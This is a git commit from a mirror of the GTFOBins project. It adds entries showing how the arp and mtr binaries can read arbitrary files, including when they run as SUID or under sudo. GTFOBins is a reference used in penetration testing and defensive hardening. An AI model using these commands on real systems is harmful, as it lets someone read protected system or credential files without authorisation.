1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00
This commit is contained in:
Emilio Pinna 2019-01-30 23:07:40 +00:00
parent d0464d7ce8
commit fc59ef546f
2 changed files with 30 additions and 0 deletions

17
_gtfobins/arp.md Normal file
View File

@ -0,0 +1,17 @@
---
description: |
The read file content is corrupted by error prints.
functions:
file-read:
- code: |
LFILE=file_to_read
arp -v -f "$LFILE"
suid:
- code: |
LFILE=file_to_read
./arp -v -f "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo arp -v -f "$LFILE"
---

13
_gtfobins/mtr.md Normal file
View File

@ -0,0 +1,13 @@
---
description: |
The read file content is corrupted by error prints.
functions:
file-read:
- code: |
LFILE=file_to_read
mtr --raw -F "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo mtr --raw -F "$LFILE"
---